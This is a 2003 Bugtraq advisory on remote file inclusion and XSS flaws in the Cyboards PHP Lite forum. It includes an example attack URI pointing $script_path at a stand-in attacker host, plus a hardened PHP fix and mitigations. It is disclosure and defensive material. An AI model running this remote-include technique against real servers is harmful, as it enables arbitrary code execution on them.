Cyboards Remote Code Execution

From: mindwarper@hush.com
Date: 01/13/03

    Date: Mon, 13 Jan 2003 13:27:33 -0800
    To: bugtraq@securityfocus.com
    From: mindwarper@hush.com
    

    Cyboards PHP Lite Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )

    <------- ------->

    ----------------------
    Vendor Information:
    ----------------------

    Homepage : http://www.gold-sonata.com
    Vendor : informed
    Mailed advisory: 13/01/03
    Vendor Response : None yet (possibly because they have no contact page and the report
    was sent to abuse@gold-sonata.com)

    ----------------------
    Affected Versions:
    ----------------------

    1.25 and prior
    (tested on 1.25 and 1.21)

    ----------------------
    Description:
    ----------------------

    Cyboards PHP Lite is a free open-source bulletin board written in PHP. Two files in the
    /include directory build include() paths from variables that an attacker can control,
    which may allow a remote attacker to execute arbitrary code on the server with the
    privileges of the web server process. Another vulnerability, also reachable through the
    /include directory, may allow an attacker to hijack other members' accounts through XSS.

    ----------------------
    Exploit:
    ----------------------

    XSS:

    XSS is possible in the following files, and possibly others:

    include/default_header.php
    include/options_form.php
    adminopts/login_form.php
    adminopts/include/ban_form.php
    adminopts/include/board_form.php
    adminopts/include/login_form.php
    adminopts/include/vip_form.php

    Remote Arbitrary Code Execution:

    Two files in the include directory are meant to be pulled in by the forum's own scripts,
    which set $script_path before including them. Neither file checks that it was actually
    included rather than requested directly, so a remote user can call it by URL with
    $script_path unset. When register_globals is enabled (the PHP default before 4.2.0, and
    still common at the time), that variable can then be supplied in the query string, and when
    allow_url_fopen is enabled include() will fetch a file over HTTP. The result is that a
    remote attacker can include their own arbitrary code and run it on the server.

    1. include/default_header.php

    -- This file looks something like this --
    ****************
    ..

    if(isset($board_config["stylesheet"])&&(trim($board_config["stylesheet"])!="")) {
      echo "<LINK REL=STYLESHEET HREF='".$board_config["stylesheet"]."' TYPE='text/css'>\n\n";
    } else {
      echo "<style>\n";
      // $script_path is never set when this file is requested directly
      include("$script_path/include/default_style.css");
      echo "\n</style>";
    }

    ..

    ****************

    When the file is requested directly, $board_config["stylesheet"] is not set, because the
    configuration is only loaded by the forum scripts that normally include this file. Execution
    therefore falls through to include("$script_path/include/default_style.css"). $script_path
    is unset for the same reason, so with register_globals on it can be supplied in the request.
    PHP executes any code it finds between <?php ... ?> tags in the fetched file regardless of
    the .css extension. By creating a directory called include on a server they control and
    placing the desired code inside default_style.css, an attacker can redirect the inclusion and
    make the script include the wrong CSS file. By doing so, PHP will execute the attacker's
    code. The URI looks something like this:

    http://victim/forum/include/default_header.php?script_path=http://attacker

    where the attacker has created a directory called /include and inside it a file called
    default_style.css which contains the malicious code.

    2. include/options_form.php

    Contains the following code on the first line:

    ---=---
    <? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>
    ---=---

    Here both $script_path and $lang_code are used unvalidated to build the include path, so
    the same technique as in default_header.php applies: a direct request that supplies
    $script_path pointing at an attacker-controlled host makes PHP fetch and execute the
    attacker's file.

    Note: An attacker can use this for an XSS attack as well, but given the possibility of
    running remote code on the server it is more probable that he/she will use it for remote
    code execution.
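
    The following is an added example written for this edit; it is not code from the Cyboards
    project or from the advisory. It shows how the two fragments above (default_header.php and
    options_form.php) can be hardened against direct calls and remote inclusion. It assumes the
    forum's entry scripts define a constant IN_CYBOARDS before including anything, that this
    file lives in <forum root>/include/, and that default_style.css is static CSS rather than
    PHP; the IN_CYBOARDS name and the language allow-list values are made up for the example.

```php
<?php
// Added example (not Cyboards' own code): hardened replacement for the
// include-only fragments quoted above.
//
// Assumptions (not from the advisory): entry scripts define IN_CYBOARDS before
// including this file; this file lives in <root>/include/; language packs live
// in <root>/lang/<code>/<code>_options.php; default_style.css is plain CSS.

// 1. Refuse to run unless pulled in by an entry script. A direct request to
//    include/default_header.php now gets a 403 instead of an include() whose
//    path is built from request-controlled variables.
if (!defined('IN_CYBOARDS')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted');
}

// 2. Never take $script_path from the request (register_globals or not):
//    derive the forum root from the location of this file instead.
$script_path = dirname(dirname(__FILE__));

// 3. Treat the language code as an index into an allow-list, not as a path
//    fragment. The list itself is a constructed example.
$allowed_langs = array('english', 'german');
if (!isset($lang_code) || !in_array($lang_code, $allowed_langs, true)) {
    $lang_code = 'english';
}

// 4. Resolve the language file and confirm it still sits under lang/ before
//    including it. realpath() returns false for a missing file, so a typo or a
//    traversal attempt fails closed instead of including something else.
$lang_dir  = realpath($script_path . '/lang');
$lang_file = realpath($script_path . '/lang/' . $lang_code . '/' . $lang_code . '_options.php');
if ($lang_dir === false || $lang_file === false
    || strpos($lang_file, $lang_dir . DIRECTORY_SEPARATOR) !== 0) {
    exit('Language pack missing');
}
include $lang_file;

// 5. Stylesheet selection: same logic as the original, but the href is
//    HTML-escaped so a tampered $board_config value cannot break out of the
//    attribute, and the fallback emits the CSS with readfile() (data) rather
//    than include() (code).
if (isset($board_config['stylesheet']) && trim($board_config['stylesheet']) !== '') {
    echo '<link rel="stylesheet" href="'
        . htmlspecialchars($board_config['stylesheet'], ENT_QUOTES)
        . '" type="text/css">' . "\n\n";
} else {
    echo "<style>\n";
    readfile($script_path . '/include/default_style.css');
    echo "\n</style>";
}
```

    The guard alone closes the direct-request vector. The fixed $script_path and the
    allow-listed $lang_code additionally remove attacker-controlled input from the include
    path even on a server that still runs with register_globals on, and readfile() makes the
    CSS fallback safe even if the path were ever tampered with, since the file is sent as text
    and never parsed as PHP.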

    ----------------------
    Solution:
    ----------------------

    Please check the vendor's website for new patches.

    As a temporary solution, create a .htaccess file that contains 'Deny from all' and place it
    in the /include directory. This blocks direct HTTP requests to the files there while leaving
    the forum's own scripts working, since include() reads from the filesystem rather than over
    HTTP. Note that .htaccess directives only take effect if the server configuration permits
    overrides (AllowOverride) for that directory, and that the adminopts/ files listed under XSS
    above are outside /include and are not covered. Setting register_globals = Off and
    allow_url_fopen = Off in php.ini removes the preconditions for the remote include itself.

    ----------------------
    Greetz:
    ----------------------

    Cyon, daemorhedron, Truckle, Methodus, MC187, DJX.

    <------- ------->
